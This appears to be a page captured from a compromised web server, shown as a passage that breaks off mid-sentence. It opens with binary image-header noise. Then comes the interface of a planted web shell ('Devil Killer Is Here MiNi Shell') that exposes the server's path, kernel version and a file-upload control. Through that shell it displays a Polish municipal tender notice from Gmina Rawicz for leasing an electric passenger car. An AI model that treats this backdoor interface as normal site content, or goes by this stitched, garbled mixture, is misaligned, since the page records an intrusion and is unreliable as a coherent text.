JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250904/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250904/0040562901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa w formie leasingu operacyjnego fabrycznie nowego elektrycznego samochodu osobowego na potrzeby Urzędu Miejskiego Gminy Rawicz </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RAWICZ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050729</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marszałka Józefa Piłsudskiego 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rawicz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-900</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@rawicz.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.rawicz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa w formie leasingu operacyjnego fabrycznie nowego elektrycznego samochodu osobowego na potrzeby Urzędu Miejskiego Gminy Rawicz </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4f6d03d0-57e0-418d-aa3a-f5f82149b689</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00405629</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00044565/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 Leasing operacyjny wraz z wykupem fabrycznie nowego elektrycznego samochodu ososbowego na potrzeby Urzędu Miejskiego Gminy Rawicz</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1168578 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1154933</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Ofertę,<br/>oświadczenie o którym mowa w art. 125 ust. 1 składa się pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2) Sposób sporządzania oraz sposób przekazywania podmiotowych środków dowodowych,<br/>przedmiotowych środków dowodowych, oraz innych informacji, oświadczeń lub dokumentów,<br/>przekazywanych w postępowaniu o udzielenie zamówienia publicznego został określony w<br/>rozporządzeniu w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej.<br/>3) Komunikacja w niniejszym postępowaniu w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą odbywa się przy<br/>użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej na stronie<br/>internetowej prowadzonego postępowania, o której mowa w rozdziale I SWZ.<br/>4) Komunikacja ustna dopuszczalna jest jedynie w toku negocjacji lub dialogu oraz w odniesieniu do<br/>informacji, które nie są istotne.<br/>5) Zamawiający awaryjnie dopuszcza komunikowanie się z Wykonawcami za pośrednictwem poczty<br/>elektronicznej przetargi@rawicz.eu – powyższe nie dotyczy składania oferty, z tym że podstawowym<br/>środkiem komunikowania się jest Platforma Zakupowa, o której wyżej mowa. W takim przypadku<br/>wszelką korespondencję do Zamawiającego związaną z niniejszym postępowaniem należy kierować<br/>do Zamawiającego, podając numer sprawy lub nazwę zadania podaną na wstępie.<br/>6) Wykonawca może się kontaktować z Zamawiającym w formie elektronicznej za pośrednictwem<br/>Platformy Zakupowej i formularzy:<br/>a) „Złóż ofertę” w odniesieniu do składania oferty<br/>b) „Wyślij wiadomość” w odniesieniu do pozostałej korespondencji kierowanej do Zamawiającego<br/>7) Zamawiający określa:<br/>a) niezbędne wymagania sprzętowe: stały dostęp do sieci Internet o gwarantowanej przepustowości<br/>nie mniejszej niż 512 kbit/s; zainstalowana dowolna przeglądarka internetowa: Internet Explorer,<br/>Chrome lub FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca<br/>pliki typu „cookies”. W przypadku Internet Explorer minimalnie wersja 10.0; komputer klasy PC lub MAC<br/>o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych – MS Windows 7, mac Os x 10 4, Linux, lub ich nowsze wersje;<br/>Platforma Zakupowa jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli;<br/>Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8,<br/>b) informacje na temat kodowania i czasu odbioru danych: oznaczenie czasu odbioru danych przez<br/>Platformę Zakupową stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas<br/>(hh:mm:ss), znajdujące się na potwierdzeniu. Czas wyświetlany na platformazakupowa.pl<br/>synchronizuje się automatycznie z serwerem Głównego Urzędu Miar; za chwilę złożenia uznaje się<br/>moment wpływu informacji na platformę<br/>c) Zamawiający informuje, że występuje limit objętości plików lub spakowanych folderów: w zakresie<br/>całej oferty: do ilości 10 plików lub spakowanych folderów przy maksymalnej wielkości 150 MB; przy<br/>komunikacji poprzez wyślij wiadomość: do ilości 10 plików lub spakowanych folderów przy<br/>maksymalnej sumarycznej wielkości 500 MB<br/>8) Zamawiający w zakresie:<br/>a) pytań technicznych dotyczących funkcjonowania i obsługi technicznej Platformy Zakupowej<br/>wskazuje kontakt z Centrum Wsparcia Klienta, które dostępne jest od poniedziałku do piątku w godz.:<br/>od 7:00 do 17:00 pod numerem telefonu (22)-101-02-02 lub e-mail cwk@platformazakupowa.pl,<br/>b) pytań merytorycznych wyznaczył następujące osoby uprawnione do komunikowania się z Wykonawcą: w zakresie procedury<br/>przetargowej: Aneta Głowacz w zakresie przedmiotu<br/>zamówienia: Katarzyna Cieślarczyk, Elżbieta Pawlak.<br/>9) Pozostałe wymagania i zalecenia zostały zawarte w rozdziale XII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna wynikająca z art. 13 ust. 1 i<br/>2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, została określona w SWZ – rozdział<br/>XXIV pkt 4</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ON.2710.18.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa fabrycznie nowego elektrycznego samochodu osobowego na potrzeby Urzędu Miejskiego Gminy Rawicz, finansowanego w formie leasingu operacyjnego z możliwością wykupu. <br/><br/>2.	Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 4 do SWZ, dotyczący minimalnych wymagań w zakresie parametrów, wyposażenia i serwisu samochodu wymaganych przez Zamawiającego.<br/>Wskazane w powyższym załączniku parametry techniczne należy traktować jako wymagane minimum, co oznacza, że Wykonawca może zaoferować pojazd o lepszych i wyższych parametrach.<br/><br/>3.	Wykonanie zamówienia oraz jego realizacja nastąpi zgodnie z postanowieniami zawartymi w niniejszej specyfikacji warunków zamówienia oraz projektowanych postanowieniach umowy stanowiącym załącznik nr 3 do SWZ.<br/><br/>4.	Wykonawca zobowiązany jest do wydania przedmiotu zamówienia wolnego od jakichkolwiek usterek, fabrycznie nowego, pełnowartościowego, wykonanego zgodnie z normami. Żadna część nie może być używana, nosić śladów uszkodzeń itp.<br/><br/>5.	Do dostarczonego samochodu muszą być dołączone stosowne dokumenty świadczące o spełnieniu wszystkich stosownych norm i wytycznych, które w/w samochód powinien spełniać przed dopuszczeniem go do użytkowania. <br/><br/>6.	Dokumenty będące podstawą realizacji przedmiotowego zamówienia publicznego powinny być traktowane jak wzajemnie się objaśniające, z zachowaniem wymienionych poniżej kolejności, w celach interpretacji ważności zapisów:<br/>1)	Projektowane postanowienia umowy i SWZ,<br/>2)	Opis przedmiotu zamówienia,<br/>3)	Oferta Wykonawcy.<br/><br/>7.	Mogące występować w dokumentach zamówienia wraz z załącznikami wskazanie znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę zostały użyte wyłącznie w celu wskazania założonego standardu przyjętych rozwiązań<br/>i stanowią warunek równoważności dla rozwiązań zamiennych. Należy każdorazowo przyjąć, że wskazaniu takiemu towarzyszą wyrazy „lub równoważny”.<br/>	Zamawiający informuje, że dopuszcza składanie rozwiązania równoważne w zakresie wskazanych znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę, jednakże zachowane muszą być normy, standardy <br/>i parametry techniczne jakimi charakteryzują się wymagane przez Zamawiającego materiały, które zagwarantują realizację robót. <br/>	Przedstawione parametry przedmiotu zamówienia stanowią minimum techniczne i jakościowe oczekiwane <br/>przez Zamawiającego i będą stanowiły podstawę oceny ewentualnej równoważności. Oferowane przez Wykonawców proponujących materiały równoważne muszą mieć parametry nie gorsze niż wskazane w dokumentach zamówienia.<br/><br/>8.	W mogących występować w dokumentach zamówienia wraz z załącznikami wskazania norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust 1 pkt 2 oraz ust. 3 ustawy Pzp dopuszcza się rozwiązania równoważne opisanym, a odniesieniu takiemu towarzyszą wyrazy „lub równoważne”.<br/><br/>9. Szczegółowe minimalne wymagania w zakresie parametrów, wyposażenia i serwisu samochodu:<br/>1.	Rok produkcji: 2024 lub nowszy<br/>2.	Rodzaj nadwozia: samochód osobowy<br/>3.	Liczba miejsc siedzących: min. 8<br/>4.	Kolor: odcienie szarości, zderzaki i listwy ochronne w kolorze nadwozia<br/>5.	Napęd: elektryczny<br/>6.	Moc silnika: minimum 150 kW<br/>7.	Zasięg na napędzie elektrycznym w cyklu – przy oszczędnej jeździe - minimum 350 km (stanowi kryterium oceny ofert)<br/>8.	Pojemność baterii 90 kwh (użytkowa)<br/>9.	Skrzynia biegów: automatyczna<br/>10.	Kabel do ładowania typ 2 3x20A min. 5 m długości, akumulator HV (90 kWh), ładowanie AC 11 kW/ ładowanie DC 110 kW<br/>11.	System elastycznego ładowania<br/>12.	Kompletny zestaw: mobilna stacja ładowania 32A.<br/>13.	Opony letnie, ogumienie 245/55 R17, obręcze ze stopów lekkich 7.0Jx17<br/>14.	Koło zapasowe<br/>15.	Układ kontroli ciśnienia w oponach<br/>16.	Automatyczne włączanie hamulca postojowego (funkcja HOLD)<br/>17.	Ogranicznik prędkości 160 km/h<br/>18.	Szyby: atermiczne (wszystkie), szyby tylne przyciemniane<br/>19. Okna: <br/>-okno stałe w ścianie bocznej/ drzwiach przes. lewe i prawe,<br/>-okna stałe, z tyłu po lewej i prawej stronie,<br/>-okno w drzwiach tylnych z wycieraczką i spryskiwaczem<br/>20. Drzwi przesuwne z lewej strony<br/>21. Wentylacja fotela kierowcy i pasażera<br/>22. Fotel kierowcy i pasażera z regulacją elektryczną<br/>23.	Podłokietniki siedzeń w przestrzeni pasażerskiej<br/>24.	Kanapy: komfortowa kanapa 3 os. w 1 rzędzie - uchylny fotel, komfortowa kanapa 3 os. w 2 rzędzie - uchylny fotel<br/>25.	Podgrzewany fotel kierowcy i pasażera obok kierowcy<br/>26. Klimatyzacja automatyczna, klimatyzacja półautomatyczna z tyłu<br/>27. Konsola środkowa ze schowkiem i miejscem na kubki<br/>28. Siatka bagażowa za oparciem fotela kierowcy i pasażera<br/>29. Kierownica regulowana w dwóch płaszczyznach, wykończona skórą, wielofunkcyjna<br/>30. Wykładzina dywanowa w przestrzeni pasażerskiej i kierowcy, tapicerowana podsufitka<br/>31.	Lusterka zewnętrzne sterowane elektrycznie i ogrzewane, podświetlane lusterka w osłonach przeciwsłonecznych<br/>32.	Oświetlenie przy podłodze z przodu, oświetlenie otoczenia klapy tylnej<br/>33. Adaptacyjne światła stop, tylne oświetlenie nocne, światła tylne i światła hamowania LED<br/>34.	Poduszka powietrzna centralna i pasażera, poduszki ochronne tułowia kierowcy i pasażera, nadokienne poduszki powietrzne<br/>35.	Bezprzewodowe ładowanie dla urządzeń mobilnych<br/>36. Gniazdo 12 V w przestrzeni bagażowej/ ładunkowej oraz dla tylnego rzędu siedzeń, prawe-lewe<br/>37.	Kokpit cyfrowy, system multimedialny z radiem i nawigacją oraz integracją ze smartfonem<br/>38.	Funkcja asystenta: asystent jazdy, asystent prędkości, asystent układu hamulcowego, asystent odległości, asystent martwego pola, asystent rozpoznawania znaków drogowych, asystent utrzymania pasa ruchu, asystent wspomagania koncentracji kierowcy, asystent ruszania na wzniesieniu, asystent świateł drogowych, automatyczny układ włączania świateł<br/>39.	Funkcja parkowania z kamerą tylną<br/>40.	System połączenia alarmowego uruchamiany w przypadku zdarzenia wymagającego interwencji służb<br/>41.	System bezpieczeństwa pojazdu i pasażerów w razie kolizji<br/>42. e-ładowanie premium<br/>43.	Tabliczki i dokumentacja w języku polskim<br/>44.	Przeglądy serwisowe przez cały okres gwarancji całopojazdowej – koszt po stronie Wykonawcy zamówienia<br/>45.	Gwarancja całopojazdowa: min. 2 lata (stanowi kryterium oceny ofert)<br/>46.	Gwarancja na akumulator min 8 lat lub min. 150 tys. km (w zależności co wystąpi jako pierwsze)<br/>47.	Gwarancja na zewnętrzne powłoki lakiernicze: min. 2 lata <br/>48.	Gwarancja na perforację korozyjną nadwozia: min. 10 lat <br/>49.	Okres rękojmi na wykonany przedmiot zamówienia na okres min. 2 lata (stanowi kryterium oceny ofert)<br/>50.	Autoryzowany serwis oferowanego przez Wykonawcę samochodu musi znajdować się w obrębie 150 km od siedziby Zamawiającego (63-900 Rawicz). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34110000-1 - Samochody osobowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66114000-2 - Usługi leasingu finansowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w<br/>rozdziale XIX SWZ.<br/>2. Zamawiający w oparciu o art. 253 ust. 1 pkt. 1 ustawy Pzp sporządzi streszczenie oceny i porównania złożonych ofert<br/>zawierających punktację przyznaną ofertom w każdym kryterium oceny i łączną punktację zgodnie ze wzorami zawartymi w<br/>rozdziale XIX SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">PRZEDŁUŻENIE OKRESU GWARANCJI JAKOŚCI I RĘKOJMI CAŁOPOJAZDOWEJ</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTARCZENIA POJAZDU</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ZASIĘG NA NAPĘDZIE ELEKTRYCZNYM PRZY OSZCZĘDNEJ JEŹDZIE</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) W celu potwierdzenia<br/>braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu, o których mowa w art. 273 ust. 1 pkt 1 ustawy Pzp, Zamawiający<br/>żąda następujących oświadczeń i dokumentów;<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>2) Informacja dla podmiotów zagranicznych wynikająca z zapisów „Rozporządzenia w sprawie podmiotowych środków dowodowych”<br/>a) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast: odpisu albo<br/>informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w<br/>pkt. 4 ppkt 1) lit. a) – składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza<br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w<br/>innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokument lub dokumenty, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem,<br/>b) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub miejsce zamieszkania ma osoba, której dokument<br/>dotyczy, nie wydaje się dokumentów, o których wyżej mowa zastępuje się je odpowiednio w całości lub w części dokumentem<br/>zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub<br/>oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma 